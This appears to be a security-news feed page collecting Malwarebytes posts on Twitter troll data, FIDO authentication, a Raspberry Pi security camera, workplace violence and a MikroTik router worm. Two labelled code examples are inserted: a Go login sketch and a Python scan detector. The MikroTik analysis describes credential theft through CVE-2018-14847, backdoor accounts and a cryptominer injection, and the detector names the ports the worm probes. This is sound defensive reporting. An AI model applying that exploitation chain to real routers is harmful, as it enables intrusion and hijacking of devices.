Techie Feeds

Information operations on Twitter: new data released on election tampering

Malwarebytes - Thu, 10/18/2018 - 15:00

Back in April, we talked about the wealth of options available to Russian hackers and others launching social engineering campaigns, whether on social networks or through clever attacks launched via Advanced Persistent Threats. Some of that was information published by Twitter at the time in relation to election tampering/interference by so-called “Russian Troll farms”—specifically, the IRA (Internet Research Agency).

Some of the numbers involved were already impressive: 3,841 accounts were linked to the IRA and around 1.6 million notifications were sent out to people who had interacted with these accounts in some way. At the tail end of 2018, Twitter has released yet more data related to this particular campaign.

For example, there are now an additional 770 accounts (potentially from Iran) to sit alongside the original 3,841 from Russia. That includes “10 million Tweets and 2 million images, GIFs, videos, and periscope broadcasts.” Some of the oldest accounts date back to 2009.

All of this has been put onto an “Elections Integrity” portal by Twitter for researchers to investigate further. That’s 1.24GB of Tweet information and 296GB of media data across 302 archives for the IRA, and 168MB of Tweet information and 65.7GB of media across 52 archives for what’s being referred to as “Iran.”

DFRLab are one of the organisations given access to the data ahead of time, and the story has recently broken elsewhere, so expect many updates and developments over the next few days. As Ben Nimmo puts it:

They were about the home government first
– had multiple goals
– targeted specific activist communities
– apolitical
– opportunistic
– evolved
– not always high-impact

The timeline of the Tweets is fascinating, as are the posting habits of both Russian and Iranian groups. For example, some individual accounts developed a “personality,” while others just attempted to trend fake stories. That thread is going to grow and grow, so you may wish to bookmark it for easy reference.

Meanwhile, DFRLab are going to be publishing a series of Medium blogs on their findings in more detail. The first is already live, and covers seven key takeaways from the research done so far.

Any doubts you may have had about the likelihood of large scale, long term, professional troll campaigns should have just been swept away. There is no doubt: This is indeed a “full fledged influence op,” and it raises many questions about what’s put into the social sphere, and (more importantly) what we do with it once viewed alongside a response from the platform itself.

We’ve already seen how Russian Facebook ads were used to try and divide opinion in the run up to the 2016 US elections, and it’s clear no expense was spared and no major platform was ignored in the quest to troll the public at large. Everyone needs to step up their game, from the people unwittingly republishing state-sanctioned social engineering ops to the platforms we use on a daily basis possessing the ability to do something about it.

The post Information operations on Twitter: new data released on election tampering appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Is FIDO the future instrument to prove our identity?

Malwarebytes - Wed, 10/17/2018 - 16:52

FIDO, short for Fast IDentity Online, is an industry consortium started in 2013 to address the lack of interoperability among strong authentication devices and the problems users face creating and remembering multiple usernames and passwords. Among the founders were those who work in the financial sector, device manufacturers, and providers of authentication solutions.

What is FIDO?

According to the FIDO Alliance website, FIDO is a set of open and scalable standards that enable simpler and more secure user authentication experiences across many websites and mobile services.

FIDO set out to make authentication devices easier to use and fix the conflicts between devices from different vendors. Their goal is to provide a set of specifications for the entire range of authentication techniques. These specifications should then provide a standard for the entire industry leading to better compatibility and more ease of use.

Logging in

Currently, there are a variety of options for users to log in to their services and devices. We have discussed the basics of two-factor authentication (2FA) in the past, and almost everyone agrees that it is impractical to remember 27 or more passwords and usernames for individual accounts—nor is it safe to re-use passwords through multiple accounts. So, what are our options for logging in?

The most common ones are divided up into these categories:

  • The classic username and password combination
  • Knowing a PIN or TAN code (ATM withdrawals, money transfers)
  • Having access to an email account (when verification codes are sent by mail) or mobile device (texted codes)
  • Secret questions (often frowned upon as they are sometimes easy to guess, or easy to obtain through phishing)
  • Physical keys (card readers, USB keys)
  • Biometrics (fingerprint readers, iris scanners, voice recognition)
  • Mobile devices that can scan barcodes or QR codes and calculate a login code for one time use (Authy, Google Authenticator)
  • Already being logged in to a verified account (e.g. Facebook login)

Problems and solutions

As FIDO seeks to standardize authentication protocols for the wide range of login options listed above, they must identify techniques that are problematic from a security standpoint and look for solutions.

One of the problems with many of these login options is the use of shared secrets, meaning that both the user and the software that checks the login need to know the correct answer. You might be able to keep a secret, but the software holding it can be fooled into handing over all your information to attackers, who regularly succeed in breaching a site’s or service’s security and obtaining a multitude of login credentials.

One solution for this problem is to use asymmetric cryptography. Basically, the user creates two different keys, a private key and a public key, and hands the public key to the website or service when signing up. At login, the service sends the user a challenge that only the holder of the private key can answer, and then checks the answer using the stored public key. As in a handshake, the answer proves possession of the private key, but it does not give away the private key itself.

The challenge is created especially for that login attempt, so the answer can’t be reused for another login with the same service or with a different service. This way, the user, who alone holds both keys, is the only one who can answer the challenge.

Advantages and disadvantages

The advantages of using asymmetric cryptography are clear:

  • It’s easy to use without having to remember a password.
  • Strong asymmetric encryption can’t be brute-forced, unlike weak passwords.
  • The same key combination can be used for multiple logins (not to be confused with the challenge question, which is uniquely generated for each login attempt).
  • It’s impossible to steal from websites and services, even using Man-in-the-Middle attacks, because the private key is never sent across the Internet.

A major setback would be if the user ever gave their private key to a third party, for example because she lost it or because she was the victim of a phishing attack that asked directly for the private key. In that case, having used this method across a multitude of sites and services means the user is in for a multitude of problems: every service she signed in to with that key pair could be compromised.
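To make the handshake described above concrete, here is an added example, not code from the article or from the FIDO Alliance, of a challenge-response login in Go using Ed25519 from the standard library. The RelyingParty, Authenticator and Response types, the user and origin strings, and the signed message layout are assumptions made for illustration and are simpler than the real WebAuthn/CTAP formats; the block also covers the two failure modes the text raises, a replayed answer and an answer produced for a look-alike site, which the phishing caveat above is about.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/subtle"
	"errors"
)

// RelyingParty models the website. It stores only public keys and the one-time
// challenges it has issued; it never holds a private key, so a breach of this
// store gives an attacker nothing to log in with. (Constructed example.)
type RelyingParty struct {
	origin  string
	pubKeys map[string]ed25519.PublicKey // user -> public key given at sign-up
	pending map[string][]byte            // user -> outstanding challenge
}

func NewRelyingParty(origin string) *RelyingParty {
	return &RelyingParty{origin: origin, pubKeys: map[string]ed25519.PublicKey{}, pending: map[string][]byte{}}
}

// Register records the public key the user supplies when signing up.
func (rp *RelyingParty) Register(user string, pub ed25519.PublicKey) { rp.pubKeys[user] = pub }

// Challenge issues a fresh random challenge for exactly one login attempt.
func (rp *RelyingParty) Challenge(user string) ([]byte, error) {
	if _, ok := rp.pubKeys[user]; !ok {
		return nil, errors.New("unknown user")
	}
	c := make([]byte, 32)
	if _, err := rand.Read(c); err != nil {
		return nil, err
	}
	rp.pending[user] = c
	return c, nil
}

// Response carries the origin the browser observed, the challenge and a
// signature over both; the private key itself is never transmitted.
type Response struct {
	Origin    string
	Challenge []byte
	Signature []byte
}

// signedMessage binds origin and challenge into the bytes that get signed.
func signedMessage(origin string, challenge []byte) []byte {
	return append(append([]byte(origin), 0), challenge...) // NUL keeps the fields apart
}

// Verify consumes the challenge whether or not it succeeds (so a captured
// answer cannot be replayed) and checks the signature over the relying
// party's own origin, so an answer that a look-alike site tricked the user
// into producing does not verify here.
func (rp *RelyingParty) Verify(user string, r Response) error {
	pub, ok := rp.pubKeys[user]
	if !ok {
		return errors.New("unknown user")
	}
	want, issued := rp.pending[user]
	delete(rp.pending, user) // single use
	if !issued {
		return errors.New("no outstanding challenge (stale or replayed response)")
	}
	if subtle.ConstantTimeCompare(want, r.Challenge) != 1 {
		return errors.New("challenge does not match the one issued")
	}
	if r.Origin != rp.origin {
		return errors.New("origin mismatch: response was produced for another site")
	}
	if !ed25519.Verify(pub, signedMessage(rp.origin, r.Challenge), r.Signature) {
		return errors.New("signature does not verify under the registered key")
	}
	return nil
}

// Authenticator models the hardware key; the private key never leaves it.
type Authenticator struct{ priv ed25519.PrivateKey }

// NewAuthenticator generates a key pair and returns the public half for registration.
func NewAuthenticator() (*Authenticator, ed25519.PublicKey, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	return &Authenticator{priv: priv}, pub, nil
}

// Answer signs the challenge together with the origin the browser reports,
// so a challenge relayed through a look-alike domain is signed for the wrong site.
func (a *Authenticator) Answer(origin string, challenge []byte) Response {
	return Response{Origin: origin, Challenge: challenge,
		Signature: ed25519.Sign(a.priv, signedMessage(origin, challenge))}
}
```

The flow is Register once, then Challenge, Answer and Verify per login; because Verify deletes the outstanding challenge before checking anything, even a failed attempt burns it and the client must ask for a new one.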

What does FIDO have to do with this?

The FIDO Alliance hosts the open authentication standard FIDO2, which enables strong, passwordless authentication built on public key cryptography using hardware devices like security keys, mobile phones, and other built-in devices. It does this using both the W3C Web Authentication specification (WebAuthn API) and the Client to Authenticator Protocol (CTAP), a protocol used for communication between a client (the browser) or a platform (the operating system) and an external authenticator, i.e., the hardware security key.

With these capabilities, the hardware security key can replace weak, static username/password credentials with strong, hardware-backed public/private-key credentials.

Because FIDO2 is an open standard, the security device can be designed for existing hardware, such as phones or computers, and for many authentication modalities. In addition, it can be used for different communication methods, such as USB, Bluetooth, and Near Field Communication (NFC), which allows for contactless authentication to take place safely from many systems and devices.

FIDO2 can be enhanced further still for organizations requiring a higher level of security, as it supports the use of a hardware authentication device with a PIN, biometric, or gesture for additional protection.

Proving your identity in the future

Where FIDO has enabled the industry to make steps toward a safer method of online authentication, it is still far from being the standard it sets out to be. The current usage of FIDO is limited to high-end applications and organizations.

And even though browsers and operating systems have started to develop built-in support for FIDO2, they are not ready for market yet. Also, a new Universal Server certification for servers that operates with all FIDO authenticator types (FIDO UAF, FIDO U2F, WebAuthn, and CTAP) is on its way. And even when those stages are complete, the websites and services that require a secure authentication method will probably need some convincing to start using this new format. And finally, only once early adopters have adapted to the technology and sung its praises will more mainstream usage follow suit.


Using asymmetric keys is the most logical and secure method to prove your identity right now, but it could very well be replaced by a blockchain technology. Given the rate of development in blockchain technology, especially compared to the relatively slow advances made in FIDO, this seems a likely scenario. And it doesn’t help that competing standards are created like the PCI-DSS, instead of bundling the efforts into creating an all-encompassing standard.

The one standard to rule them all will probably be the one that has the widest applicability. Being able to log in anywhere without the hassle of passwords almost sounds too good to be true, but the answers are out there. Hopefully, with the application of the best standard, we will see a future with fewer breaches and more peace of mind.


How to build your own motion-activated security camera

Malwarebytes - Tue, 10/16/2018 - 15:00

Attention makers! Are you looking for a challenging project that not only gets your gears grinding but helps to keep you secure while traveling? Welcome to the build-your-own security camera tutorial.

The impetus for this project originated from events that took place at Defcon 26, where hotel security staff inspected attendee rooms while not properly identifying themselves.

Gross overreach. Violation of your rights. Violation of your privacy. These are always good motivators. The whole story is well covered here.

So our goal is to build a motion-activated security camera that we can use to monitor our own hotel rooms, homes, or other locations. Let’s begin.

Choosing the hardware

While there does exist ready-made hardware that would satisfy my requirements, as a quick web search demonstrated, I would need to assess the security posture of each of these products, whereas if I build the device myself I can build satisfactory security into the hardware.

A selection of commercially available portable spy cameras.

Building such a device should be possible with open-source software and off-the-shelf components. This should be easy, right?

After a quick rummage through my spare parts bin, I found a first-generation Raspberry Pi.

Raspberry Pi classic

After some careful consideration, I elected to have the captured video and stills saved locally. This device is going to be deployed on the most hostile network ever, after all. I could hard wire it to the hotel network, or try and provide it with cellular connectivity maybe by using something like a nova global cellular modem.

I decided against it: Better to start small and limit the scope of the project. I can always add this functionality later, and using a cellular modem isn’t a guarantee that the network traffic will not be tampered with or intercepted.

After some research, I confirmed that the latest version of Raspbian (the official Raspberry Pi OS) still supports the original Raspberry Pi. Further digging yielded 16GB and 32GB SD cards. Both of these would be well suited to the task. I started by performing a fresh install of the Raspbian OS to confirm that everything is okay with this Raspberry Pi. It’s been a few years and I had forgotten exactly why it had been disused.

I downloaded the latest version of Raspbian here.

Software and tools

I then extracted the 2018-06-27-raspbian-stretch.img from the raspbian-2018-06-29/ archive, and used Etcher to copy it to said SD card.

Etcher is a program that facilitates writing images to SD cards.

After inserting the SD card into the RPI and connecting a keyboard and monitor to it, I played around with it for a while. Once I was satisfied that, other than being a little old, everything was working, I added some heatsinks, as it is a cheap upgrade. I foresee the device running for several days in a row.

A simple heatsink kit available for the Raspberry Pi.

I also took the opportunity to verify the exact model of Raspberry Pi I had. This was achieved with the command: cat /proc/device-tree/model

The result was: Raspberry Pi Model b rev. 2

I also dug up a cheap USB webcam I already had. The plan was to recycle old hardware and avoid additional costs. (More later on why this was not a good idea for this particular project.) The webcam I had kicking around was a Logitech LZ241DV. I researched its compatibility on the Raspberry Pi webcam compatibility list, and it didn’t show much promise.

A quick Ctrl + F search for the Logitech camera’s model number on the page listing Raspberry Pi compatible webcams yielded zero hits.

Choosing an OS

During my research for this project, it quickly became apparent that the most suited operating system for this project isn’t in fact Raspbian, but motioneyeOS.

motionEyeOS is, according to its github wiki, a Linux distribution that turns a single-board computer into a video surveillance system.

Not only is motioneyeOS specifically tailored to our task, but it has a Raspberry Pi–specific compiled version. I downloaded the appropriate versions for the hardware I have on hand.

I installed motioneyeOS on a different SD card, connected the USB camera, wired in a network cable, and plugged it into a test network I have in the lab.

To connect to the motioneyeOS Raspberry Pi, you can use a browser on any machine on the same network and simply type the IP address of the motioneyeOS Raspberry Pi into the browser. Then, you will be greeted with a web-based management interface.

Simple diagram showing the topology of the motioneyeOS Raspberry Pi in relation to the machine used to configure it via the web interface.

Once the Raspberry Pi was fully booted, I ran a quick Nmap ping scan of the network from a machine that also resides on the same network: nmap -sP

Example of the nmap command in bash to determine the IP address of the motioneyeOS device.

It is best to perform this nmap scan before and after turning the Raspberry Pi on. The new address shown by nmap will be the instance of motioneyeOS.

NB: This IP address can change between reboots!

The web-based interface for motioneyeOS, showing the USB camera garbled video

If you connect a monitor to the Raspberry Pi running motioneyeOS, it will also display its IP at the prompt. As we can see, the USB webcam doesn’t want to play video properly. I investigated on the web for a while, and tried routing the USB webcam through a powered hub. (This was one of the possible solutions I found online.) All to no avail.

At this point, to be thorough, I also downloaded the Raspberry Pi 3 image for motioneyeOS.

I flashed it on a 32GB micro SD card, temporarily decommissioned my retro gaming emulation project, and tested the USB webcam on a current and known working Raspberry Pi 3. (The cool thing about this is that restoring that project will only require swapping back my original micro SD card.)

Same results.

So the webcam isn’t going to work without some serious fiddling about. After giving this some more thought, I elected to buy the Raspberry Pi specific camera. If I’m going to have to buy a camera of some sort, best to get one made specifically for the Raspberry Pi in the first place.

I settled on the Raspberry Pi Camera Module V2-8 Megapixel, 1080p. There are low light versions of these cameras, but I want the higher picture quality.


And this is where it gets messy. The module that came in the mail was either defective right out of the box, or I zapped it with static electricity early on.

I spent hours reinstalling Raspbian on the original Raspberry Pi, disconnecting and reconnecting the ribbon connector at both ends. I disconnected the camera module from the mini daughter board and reseated it. I reinstalled motioneyeOS, disconnecting and re-connecting the ribbon again, and repeated the whole process with the Raspberry Pi 3, both in Raspbian and motioneyeOS.

This confirmed that the camera module was indeed dead on arrival (DOA). Nothing I did yielded success. The best I could achieve was command line confirmation that the camera was present. The web interface of motioneyeOS always complained that the camera could not be initialized.

I decided to order a different camera module. I settled on the Keyestudio Camera Module 5MP REV 1.3 for Raspberry Pi. It is Raspberry Pi specific, but a different brand than my first attempt.

This solved all the problems, and I was met with success on the first boot attempt of the classic Raspberry Pi running motioneyeOS.

Successful video capture!

To have access to all the features and settings of motioneyeOS, you need to log in as “admin.”

The username and password should be changed to something non-default when you deploy this in your hotel room.

I also disabled the FTP server, the Samba server, and the SSH server, to reduce the attack surface of this device as much as possible. I can retrieve the desired footage either directly from the micro SD card or by re-enabling SSH afterwards.

If DHCP is enabled and the network cable is disconnected, the machine will boot loop as it tries to renew an IP address.

In the advanced settings, you can also enable motion notification. This is where you would enable the actions to take place should a motion be detected. This is also where you would configure the aforementioned nova cellular modem.

The final product

So there you have it. After some effort, we have a motion-activated security camera, built with off-the-shelf components and open-source software.

The finished product. (The screen is superfluous and was only used for configuration purposes.)

What lessons did we learn?

  • Don’t assume the hardware you have is working. It went in the junk pile for a reason. For example, I wasn’t able to up-cycle the USB webcam.
  • Micro SD memory cards are small and easily misplaced. (I lost one during this experiment!)
  • SD cards can fail. I used the SD memory card formatter from to confirm this.
  • Even new hardware can be defective. I had a defective Raspberry Pi camera. It failed right out of the box. This forced me to do a lot of detective work and test all the hardware.
  • This wound up being quite a bit more expensive than an off-the-shelf commercial product. It was a great learning experience, though.

What’s left to do?

I need to build a good case for my Frankenstein security camera, because static electricity is a definite concern here. Exposed electronics are not a good thing. Also, the security staff, should they actually visit your room, might be alarmed at seeing a hodgepodge of components and wires sitting on a desk.

There are several articles on the web describing how to build and deploy motioneyeOS on a Raspberry Pi. I always find that they never give you the full story. Failures, both in hardware and software configurations, are an opportunity to learn.


A week in security (October 8 – 14)

Malwarebytes - Mon, 10/15/2018 - 15:56

Last week, we warned you away from some dubious Doctor Who streams, explained how Endpoint Detection and Response may not be enough, and explored what happens during a confusing supply chain story. We also showed you how to keep up with security, explained the risks of fake browser updates, and explored the unpleasant world of workplace violence.


Stay safe, everyone!


Malwarebytes Labs Cybercrime Tactics and Techniques Report (CTNT) shows shift to business targets in Q3

Malwarebytes - Mon, 10/15/2018 - 07:01

Once again, it’s that time of year: time for the quarterly Malwarebytes Labs Cybercrime Tactics and Techniques Report. Strap in your seat belts, folks, because the third quarter of 2018 was quite a wild ride.

After a sleepy first two quarters, cybercriminals shook out the cobwebs and revved up their engines in Q3 2018. With cryptominers and exploit kits maturing, ransomware ramping up with steady, sophisticated attacks, and banking Trojans experiencing a renaissance, we’re having one heck of a season. Attack vectors were at their most creative—and most difficult to remediate—especially for businesses.

In fact, businesses saw far more action this quarter than consumers—their total detections trended upwards by 55 percent, while consumer detections increased only by 4 percent quarter over quarter. It looks like threat actors are searching for more bang for their buck, and business targets are returning more value for their efforts. Banking Trojans and ransomware, traditionally aimed at both businesses and consumers, leaned much harder into their business targets this quarter. Even malware that has generally favored consumers, such as cryptominers and adware, seems to have graduated to more professional prey.

Consumers didn’t get away from Q3 unscathed, however. They saw a whole lot of scam action this quarter, especially the ever-classic sexploitation technique, but this time it came with a twist—scammers used stale personally identifiable information (PII) likely pulled from breaches of old to scare users into action. And although the bad guys were up to no good, we at Malwarebytes had a field day taking a bunch of them down.

So how did we draw our conclusions for this report? As we’ve done for the last several quarterly reports, we combined intel and statistics gathered from July through September 2018 from our Intelligence, Research, and Data Science teams with telemetry from both our consumer and business products, which are deployed on millions of machines.

If you want to learn more about the key developments in cybercrime last quarter, including the latest threats, newest attack methods, noteworthy scams, and predictions for Q4 cybercrime trends, check out the full Malwarebytes Labs Cybercrime Tactics and Techniques Report.


Workplace violence: the forgotten insider threat

Malwarebytes - Fri, 10/12/2018 - 16:00

Organizations are no stranger to insider threats. In fact, for those who have been around since long before the Internet, workplace violence (alongside spying) is a problem many businesses have seen before and sought to address.

However, the adoption and use of the Internet completely changed the way organizations run and grow their businesses, how customers can communicate with companies, and how employees do their jobs. And with this advancement—as we’re well aware by now—comes new, more sophisticated challenges that can compound the risks that organizations face from insiders.

When it comes to security, many enterprises are focused on beefing up their system and network defenses to keep outside hackers from getting their hands on digital assets. In addition, organizations are now more aware of the threat that malicious insiders pose—whether that’s stealing proprietary information or spying for competitors. Yet it seems that little or no attention is given to addressing workplace violence as a whole.

An overview of workplace violence

In our previous blog on insider threats, we defined workplace violence (WPV) as “violence or threat of violence against employees and/or themselves.” This can manifest in the form of physical attacks, threatening or intimidating behavior and speech (written, verbal, or electronically transmitted), harassment, property damage, or other acts that could put people at risk.

Early signs of potential for violence include threats of bodily harm (often framed as a joke, a passing comment, or a verbalization of violent thoughts), insults, passive-aggressive actions, dramatic or unreasonable demands, withdrawal (especially if they used to be sociable), and sudden undue whining or complaining. Other manifestations may not be evident at first, either.

Knowing this, one might think it is essential for organizations of any size to be able to identify and tackle workplace violence head on, on top of improving their network defenses. Sadly, this isn’t the case.

Although organizations are required by law to keep employees safe by creating a healthy, hazard-free workplace environment, almost half of executives in a corporate survey conducted by TAL Global, a security and risk management company, believe that “workplace violence is not an issue that needs to be addressed.” It’s also frustrating to note that more than half of these executives “do not believe that workplace violence will create a negative impact on their budget.”

This is a serious oversight, especially when the Department of Justice estimates that workplace violence costs US businesses about $36 billion per year in lost productivity, property, and most importantly, employee lives.

The workplace, redefined

While we’re on the subject of WPV, it’s important to remind ourselves that the definition of “workplace” has evolved over time and is no longer confined within the walls of a traditional office building. Today, the workplace can be your home, your favorite coffee shop, the local library, or even a co-working space.

Over the last decade, the number of telecommuting workers has increased by 115 percent, according to a 2017 report from Global Workplace Analytics and FlexJobs. And while working from home is beneficial for both employees and employers, it also comes with its own risks.

While organizations must be sure to protect their sensitive client and company data accessed outside of the office network by remote workers, they also have to ensure workplace security in the telecommuter’s home office.

Why? Because a home office, according to the Occupational Safety and Health Administration, is still under the employer’s jurisdiction. Therefore, they must make sure that home offices are safe and hazard-free. This could also mean that policies governing workplace violence could be adapted from the office to the home office.

Is workplace violence on the rise?

Perhaps. The TL;DR answer to that question is this: It depends on the industry (e.g., incidents of workplace violence in healthcare are far more common than in other industries) or the type of violent incident (e.g., non-fatal assaults have decreased while workplace homicides have increased).

Regardless of whether WPV has decreased or increased, it’s clear that the issue needs addressing. The promotion and adherence to the “It wouldn’t happen to us!” myth didn’t save organizations from hackers breaching their systems, so why should it keep them from WPV incidents?


Types of WPV

Talking about workplace violence may conjure up highly-publicized images of active shooters stationed on campus. Let us keep in mind, however, that not all workplace violence events happen this way. According to Steve Crimando, an expert in the field of threat assessment and threat management, there are five current types we all need to familiarize ourselves with. They are:

  • Criminal intent. This type usually involves criminals who target establishments, often with the intent to steal. Robbers and shoplifters belong to this type.
  • Customer/Client. This type is perpetrated by customers or patients (including their relatives) against one or more workers servicing them. Verbal abuse against workers in healthcare and social services is an example.
  • Worker-to-worker. This is probably the type employees can relate to the most. These acts of violence can be perpetrated by either current or former employees toward one or more other employees of an organization. Workplace bullying is an example of this type.
  • Domestic violence. More commonly, women have been victims of domestic violence in the workplace, but that isn’t to say that this doesn’t happen to men.
  • Ideological violence. This type could either be perpetrated by radicalized employees or by external actors targeting organizations, their people, and their property for reasons related to ideology, politics, or religion. Active shootings and terrorist attacks are examples that fall under this type.

Some organizations only partially recognize stalking and cyberbullying as workplace violence, but we’d consider them to be as well.

Practical ways organizations can help address WPV

Marianne Alvarez, co-founder and director of training at the ALICE (Alert, Lockdown, Inform, Counter, Evaluate) Training Institute in California, has provided tips on how organizations can prepare themselves for potential incidents of workplace violence. Her recommendations include:


  • Organizations must check the overall health of the organization’s safety and physical security. This may involve hiring a certified risk assessment professional who can conduct a full onsite evaluation of security gaps or weaknesses the business may have to address. The risk assessment professional inspects infrastructure weaknesses (locks, CCTV cameras, etc.) as well as the prevention and training programs that are in place, to see if these need to be enhanced.
  • Once the risks and weaknesses are identified, the organization can then prioritize which ones to address first. During the prioritization phase, they should also set a plan and a budget.
  • Organizations must continue training—or in some cases, re-training—their employees on how to respond to incidents of workplace violence, whether it be a full-blown shouting match between two workers or an incident involving aggressive intruders.

It’s imperative that companies stress the importance of preventing the escalation of a negative encounter in the workplace to an active shooting event.

“The training should include a blended model of classroom-type learning, a test to ensure learning, and drills to practice what they learned,” said Alvarez. “Much like CPR, one must be able to apply the appropriate concepts while under the pressure of a critical event. The only way to ensure this is to repeat the practice of the concepts in live drills.”

When work life bleeds into personal life

Modern-day workers have come to perceive and accept their work lives as something inseparable from their personal lives. It’s a mindset and lifestyle prevalent among those working in tech industry hotspots like Silicon Valley, as well as financial hubs such as Wall Street. So feeling like a failure at work can make one feel like a failure in life.

“An employee can feel that they give their all to a company, making employment feel like less of a job and more a way of life,” said Leslie Garcia, CEO of Executech Security Solutions. “When not recognized for their efforts or terminated for poor work performance, this could possibly trigger a retaliatory emotional and potentially dangerous physical response.”

It’s vital to address vulnerabilities in systems that endanger valuable data. However, it is equally important to take care of the people under an organization’s watch. Ideally, an overall workplace security posture (one that covers the protection and safety of the business’s infrastructure, tangible assets, digital assets, and its people), coupled with a culture that intentionally ingrains security behaviors, awareness, and proper reporting practices, would be able to mitigate workplace violence as well.

In the face of workplace violence, these are thoughts organizations must ponder, recognize, accept, and take action on. The lives of their employees depend on it.

The post Workplace violence: the forgotten insider threat appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake browser update seeks to compromise more MikroTik routers

Malwarebytes - Fri, 10/12/2018 - 15:00

This blog post was authored by @hasherezade and Jérôme Segura.

MikroTik, a Latvian company that makes routers and ISP wireless systems, has been dealing with several vulnerabilities affecting its products’ operating system over the past few months. Ever since a critical flaw in RouterOS was identified in late April 2018, attacks have been going on at an alarming rate, made worse when a newly-found exploitation technique for CVE-2018-14847 was identified.

Part of the problem is that a large number of MikroTik routers remain unpatched and are prey for automated attacks, despite security fixes made available by the vendor. Criminals were quick to leverage Proof of Concept code to compromise hundreds of thousands of devices in a short time frame. Last summer, researchers at SpiderLabs discovered what was perhaps the biggest malicious Coinhive campaign via hacked MikroTik devices, which has evolved into a much wider problem now.

With this latest trick, users behind compromised routers are served a fake browser update page. When they run this malicious update, it unpacks code onto their computer that scans the Internet for other vulnerable routers and tries to exploit them.

Suspicious browser update

Security researcher @VriesHd first spotted a new campaign attempting to further compromise vulnerable routers using a typical social engineering technique. Internet providers that operate infected MikroTik routers will serve this malicious redirect about an “old version of the browser” to their end users:

According to a search via Censys, there are about 11,000 compromised MikroTik devices hosting this fake download page:

The alleged browser update is suspiciously downloaded from an FTP server, as seen below:

Interestingly, this IP address is also listed as a free and open web proxy. Proxies are often used by those who wish to bypass certain country restrictions (e.g., watching the American version of Netflix if you are not in the US) or simply as a way to mask their IP address.

Payload analysis

Behavioral analysis

The payload follows the theme of pretending to be an installer named upd_browser.

When we deploy it, it pops up an error:

However, if we capture the network traffic, we can see that in the background it scans various IP addresses, trying to connect on port 8291 (the default port for managing MikroTik routers via the Winbox application):

The dropped payload is a relatively big executable (7.25 MB) with a huge overlay. The sections’ headers and their visualizations are given below:

As we can recognize by looking at the section names, it comes packed by a popular, simple packer: UPX. The size of the overlay suggests that there is something more to be extracted. After further examination, we find out that it unpacks a Python DLL and other related files into the %TEMP% folder, and then loads them. At this point, it is easy to guess that this EXE is in reality a wrapped Python script. We can unpack it following the same procedure as the one described here.

The Entry Point is in the script named upd_browser. After decompiling and following the scripts, we find out that the malware’s core consists of two Python scripts: and

Inside the scripts

The main function of the module is pretty simple:

As we can see, the error pop-up is hardcoded: It does not alert about any actual error, but is used as a decoy.

After that, the malware logs the IP address of the victim by querying a hardcoded address of a tracker made using a legitimate service, IP Logger. The tracker takes the form of a one pixel–sized image:

Later, this address is queried repeatedly in a defined time interval.

The most important actions are performed in the function named “scan,” which is deployed in several parallel threads (the maximum number of threads is defined as thmax = 600). The function “scan” generates pseudo-random IP addresses and tries to connect to each of them on the aforementioned port 8291. When the connection attempt is successful, it tries another connection, this time on a random port from the range 56778 to 56887. When this one fails, it proceeds with the exploitation:
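As an added example (not code from the post or from the malware), here is a small detector that turns the scanning behaviour just described into a network-side check: it reads outbound connection logs and flags any internal host that probes port 8291 on many distinct addresses, counting follow-up probes in the 56778–56887 range as supporting evidence. The log format, the internal addresses, the TEST-NET destination ranges and the alert threshold are assumptions made for this example.

```python
"""Detect upd_browser-style Winbox scanning in outbound connection logs.

Added example, not code from the Malwarebytes post.  Assumed (constructed)
log format, one connection per line:

    <timestamp> <src_ip> <dst_ip> <dst_port> <result>
"""
from collections import defaultdict
from dataclasses import dataclass, field

WINBOX_PORT = 8291                        # Winbox management port probed by the scanner
SECOND_STAGE_PORTS = range(56778, 56888)  # random follow-up port range named in the post
SCAN_THRESHOLD = 20                       # distinct hosts on 8291 before we alert (assumption)


@dataclass
class HostProfile:
    """What one internal source has been doing."""
    winbox_targets: set = field(default_factory=set)   # distinct dst_ip seen on 8291
    second_stage: int = 0                              # probes into 56778-56887


def parse_line(line):
    """Split one log line into (timestamp, src, dst, port, result)."""
    ts, src, dst, port, result = line.split()
    return ts, src, dst, int(port), result


def profile_hosts(lines):
    """Aggregate per-source behaviour over all log lines."""
    profiles = defaultdict(HostProfile)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        _ts, src, dst, port, _result = parse_line(line)
        p = profiles[src]
        if port == WINBOX_PORT:
            p.winbox_targets.add(dst)
        elif port in SECOND_STAGE_PORTS:
            p.second_stage += 1
    return profiles


def find_scanners(lines, threshold=SCAN_THRESHOLD):
    """Return one alert per source that touched >= threshold distinct hosts on 8291."""
    alerts = []
    for src, p in profile_hosts(lines).items():
        if len(p.winbox_targets) >= threshold:
            alerts.append({
                "src": src,
                "targets": len(p.winbox_targets),
                "second_stage_probes": p.second_stage,
            })
    return alerts


def _constructed_sample():
    """Constructed log lines: one scanning endpoint and one legitimate admin."""
    lines = []
    # 10.0.0.5 behaves like the infected machine: many distinct targets on 8291.
    for i in range(1, 26):
        lines.append(f"2018-10-12T10:00:{i:02d} 10.0.0.5 198.51.100.{i} 8291 rst")
    # Three follow-up probes on the random second-stage port range.
    lines.append("2018-10-12T10:01:00 10.0.0.5 203.0.113.7 56800 rst")
    lines.append("2018-10-12T10:01:01 10.0.0.5 203.0.113.8 56850 rst")
    lines.append("2018-10-12T10:01:02 10.0.0.5 203.0.113.9 56780 rst")
    # 10.0.0.9 is an administrator using Winbox against the two company routers.
    lines.append("2018-10-12T10:02:00 10.0.0.9 192.0.2.1 8291 ok")
    lines.append("2018-10-12T10:02:05 10.0.0.9 192.0.2.2 8291 ok")
    return lines


SAMPLE_LOG = _constructed_sample()

if __name__ == "__main__":
    for alert in find_scanners(SAMPLE_LOG):
        print(alert)
```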

The function “poc” is meant to infect the router using known vulnerabilities. It starts by attempting to retrieve credentials leveraging the path traversal vulnerability (CVE-2018-14847):

The user.dat file is expected to be in M2 format, so the script comes with a built-in parser (function load_file):

If retrieving the password from user.dat file is successful, it decodes the credentials and uses them to create a backdoor: an account with a randomly-generated password. It also sets a scheduled task to be executed by the router.

The script that is set in the scheduler is generated from a hardcoded template (cleaned version available here). Its role is to manipulate the router’s settings and set up an error page loading a CoinHive miner.

The error page can be dropped in two locations: “webproxy/error.html” or “flash/webproxy/error.html”.

